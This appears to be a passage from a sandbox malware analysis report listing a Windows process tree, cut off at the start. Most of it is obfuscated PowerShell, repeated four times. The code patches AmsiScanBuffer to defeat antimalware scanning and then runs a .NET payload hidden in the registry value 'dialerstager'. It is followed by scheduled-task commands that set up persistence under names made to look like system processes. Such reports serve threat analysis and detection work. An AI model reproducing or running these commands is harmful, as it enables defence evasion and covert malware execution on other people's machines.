@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MGzCfKeQWTq=$rqZPZBzKBKLqy.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$jPGpVLQnaPHdyN=$kFLzYFUbuDshCx.Invoke($Null,@([Object]$MGzCfKeQWTq,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+'i'+'b'+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$hPyWBydHZGYfMmvIJ=$kFLzYFUbuDshCx.Invoke($Null,@([Object]$MGzCfKeQWTq,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+'ot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$daIyWTD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jPGpVLQnaPHdyN,$xQkRezmyYJPnEIQQPnu).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+'l'+'l');$sZTFGLGOQRaBlDrJV=$kFLzYFUbuDshCx.Invoke($Null,@([Object]$daIyWTD,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$wenMIHelgH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPyWBydHZGYfMmvIJ,$DwdwuTHSbyQAIXqOFrltyC).Invoke($sZTFGLGOQRaBlDrJV,[uint32]8,4,[ref]$wenMIHelgH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$sZTFGLGOQRaBlDrJV,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPyWBydHZGYfMmvIJ,$DwdwuTHSbyQAIXqOFrltyC).Invoke($sZTFGLGOQRaBlDrJV,[uint32]8,0x20,[ref]$wenMIHelgH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4708
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WHMxFuvGbYIJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jgTFBDJakecXGo,[Parameter(Position=1)][Type]$CtKFziWJgL)$asAapcHTSHN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'fl'+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Me'+'m'+''+[Char](111)+'r'+[Char](121)+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+','+''+[Char](80)+'u'+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+'oCl'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$asAapcHTSHN.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$jgTFBDJakecXGo).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+'Ma'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$asAapcHTSHN.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c'+[Char](44)+'Hi'+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+'e'+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+'l'+'',$CtKFziWJgL,$jgTFBDJakecXGo).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $asAapcHTSHN.CreateType();}$ocFMVpKQLVtYb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+'.'+'dl'+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](111)+''+'c'+'F'+[Char](77)+''+[Char](86)+''+'p'+''+'K'+''+[Char](81)+''+[Char](76)+''+[Char](86)+''+[Char](116)+''+[Char](89)+'b');$adDlvrqfcOQENH=$ocFMVpKQLVtYb.GetMethod(''+[Char](97)+''+[Char](100)+''+[Char](68)+''+'l'+'v'+[Char](114)+''+[Char](113)+''+[Char](102)+''+[Char](99)+'O'+'Q'+'E'+[Char](78)+''+'H'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+'St'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NqxpRjZLbcInqMOofGy=WHMxFuvGbYIJ @([String])([IntPtr]);$CPUHTIDyZDnIMEFPtdmbCD=WHMxFuvGbYIJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AiosDxRPQsm=$ocFMVpKQLVtYb.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'er'+'n'+''+'e'+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$EPPTVOPcpiOwTI=$adDlvrqfcOQENH.Invoke($Null,@([Object]$AiosDxRPQsm,[Object]('L'+'o'+'a'+'d'+'L'+'i'+''+'b'+'rar'+'y'+''+[Char](65)+'')));$DuuLyiqcxkhszjrKh=$adDlvrqfcOQENH.Invoke($Null,@([Object]$AiosDxRPQsm,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'ua'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$OBVceui=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EPPTVOPcpiOwTI,$NqxpRjZLbcInqMOofGy).Invoke(''+[Char](97)+'ms'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$YhhKkqIdnnUztRkTb=$adDlvrqfcOQENH.Invoke($Null,@([Object]$OBVceui,[Object]('Am'+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$fglmIQXcfW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuuLyiqcxkhszjrKh,$CPUHTIDyZDnIMEFPtdmbCD).Invoke($YhhKkqIdnnUztRkTb,[uint32]8,4,[ref]$fglmIQXcfW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YhhKkqIdnnUztRkTb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuuLyiqcxkhszjrKh,$CPUHTIDyZDnIMEFPtdmbCD).Invoke($YhhKkqIdnnUztRkTb,[uint32]8,0x20,[ref]$fglmIQXcfW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'WA'+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+'a'+''+'l'+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  PID:1168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DOAdBvBCrVOH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rCqfCiycYVkkLX,[Parameter(Position=1)][Type]$KZnDqHcHOe)$KCEaIwzfmVx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+'e'+'c'+[Char](116)+''+'e'+'dD'+'e'+''+[Char](108)+'ega'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+'m'+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'gate'+[Char](84)+'y'+'p'+''+[Char](101)+'',''+'C'+''+'l'+'ass'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+'Cla'+[Char](115)+'s'+[Char](44)+''+[Char](65)+'utoC'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$KCEaIwzfmVx.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+'p'+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$rCqfCiycYVkkLX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$KCEaIwzfmVx.DefineMethod('I'+'n'+'vo'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'New'+'S'+'l'+'o'+''+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$KZnDqHcHOe,$rCqfCiycYVkkLX).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $KCEaIwzfmVx.CreateType();}$ZbTNrUeaSoweX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+'.'+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+'sof'+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'Z'+'b'+''+[Char](84)+'N'+[Char](114)+''+[Char](85)+'e'+[Char](97)+'S'+[Char](111)+''+'w'+''+'e'+'X');$ULYFXvdklWcjmL=$ZbTNrUeaSoweX.GetMethod(''+[Char](85)+'LYF'+[Char](88)+''+[Char](118)+''+[Char](100)+''+'k'+''+'l'+''+'W'+''+[Char](99)+''+'j'+''+[Char](109)+''+[Char](76)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+','+'Stati'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rMSOSAcOhhKuQzKpFiU=DOAdBvBCrVOH @([String])([IntPtr]);$wSIEDLIlFGwtTIkvjMABHT=DOAdBvBCrVOH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hbqDeuveuhv=$ZbTNrUeaSoweX.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'od'+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+'l'+'32.'+'d'+'l'+[Char](108)+'')));$FstHsiqVoiwCam=$ULYFXvdklWcjmL.Invoke($Null,@([Object]$hbqDeuveuhv,[Object]('L'+[Char](111)+'ad'+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'ry'+[Char](65)+'')));$fNtHAuuxUHsmWtSAK=$ULYFXvdklWcjmL.Invoke($Null,@([Object]$hbqDeuveuhv,[Object]('V'+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'rot'+[Char](101)+''+[Char](99)+'t')));$bwjVdFE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FstHsiqVoiwCam,$rMSOSAcOhhKuQzKpFiU).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$LrHAINEOsXGNigxML=$ULYFXvdklWcjmL.Invoke($Null,@([Object]$bwjVdFE,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$HqwbsWlDXi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fNtHAuuxUHsmWtSAK,$wSIEDLIlFGwtTIkvjMABHT).Invoke($LrHAINEOsXGNigxML,[uint32]8,4,[ref]$HqwbsWlDXi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$LrHAINEOsXGNigxML,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fNtHAuuxUHsmWtSAK,$wSIEDLIlFGwtTIkvjMABHT).Invoke($LrHAINEOsXGNigxML,[uint32]8,0x20,[ref]$HqwbsWlDXi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+''+[Char](87)+'AR'+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+'rs'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  PID:3844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SJaPUaSSGdAh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jRcDmpGIjiMtOF,[Parameter(Position=1)][Type]$qBEwNbVVqW)$uyrqOJLaZPq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'c'+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+[Char](108)+'eg'+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+'lic'+[Char](44)+''+'S'+'eal'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+'u'+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$uyrqOJLaZPq.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$jRcDmpGIjiMtOF).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$uyrqOJLaZPq.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$qBEwNbVVqW,$jRcDmpGIjiMtOF).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $uyrqOJLaZPq.CreateType();}$GycDkfaYcDJST=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'st'+'e'+''+[Char](109)+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+'ro'+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+'2'+'.U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+'eGy'+[Char](99)+''+[Char](68)+''+'k'+'f'+[Char](97)+''+'Y'+''+'c'+''+[Char](68)+''+[Char](74)+''+[Char](83)+''+[Char](84)+'');$yPEembecgoZkMU=$GycDkfaYcDJST.GetMethod(''+'y'+'P'+[Char](69)+''+'e'+''+'m'+''+[Char](98)+'e'+[Char](99)+'go'+'Z'+'k'+'M'+''+'U'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+',S'+'t'+'a'+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iKMhXcLfynFvXJxxRxN=SJaPUaSSGdAh @([String])([IntPtr]);$QIvESlKQpeXnQvBBgDWNao=SJaPUaSSGdAh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GsHUmWHWkfH=$GycDkfaYcDJST.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+'duleH'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$iQgPLGTxJzGYPr=$yPEembecgoZkMU.Invoke($Null,@([Object]$GsHUmWHWkfH,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+'y'+'A'+'')));$CNhHwKLAckmHnbxDB=$yPEembecgoZkMU.Invoke($Null,@([Object]$GsHUmWHWkfH,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$ryqZiab=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iQgPLGTxJzGYPr,$iKMhXcLfynFvXJxxRxN).Invoke(''+[Char](97)+''+'m'+'si'+'.'+''+[Char](100)+'l'+[Char](108)+'');$TaNneySPjHzPOdHnP=$yPEembecgoZkMU.Invoke($Null,@([Object]$ryqZiab,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$LgshzCjXoB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CNhHwKLAckmHnbxDB,$QIvESlKQpeXnQvBBgDWNao).Invoke($TaNneySPjHzPOdHnP,[uint32]8,4,[ref]$LgshzCjXoB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TaNneySPjHzPOdHnP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CNhHwKLAckmHnbxDB,$QIvESlKQpeXnQvBBgDWNao).Invoke($TaNneySPjHzPOdHnP,[uint32]8,0x20,[ref]$LgshzCjXoB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'TW'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  PID:3372

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:740

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3368

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3620

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4804

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2128
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2128 -s 1060
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\ServiceProfiles\NetworkService\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\NetworkService\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\ServiceProfiles\NetworkService\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Videos\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Videos\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MssurrogateMonitorM" /sc MINUTE /mo 8 /tr "'C:\Users\Default\MssurrogateMonitor.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MssurrogateMonitor" /sc ONLOGON /tr "'C:\Users\Default\MssurrogateMonitor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MssurrogateMonitorM" /sc MINUTE /mo 14 /tr "'C:\Users\Default\MssurrogateMonitor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dialerd" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\dialer.exe'" /f
1⤵
- Process spawned unexpected child process
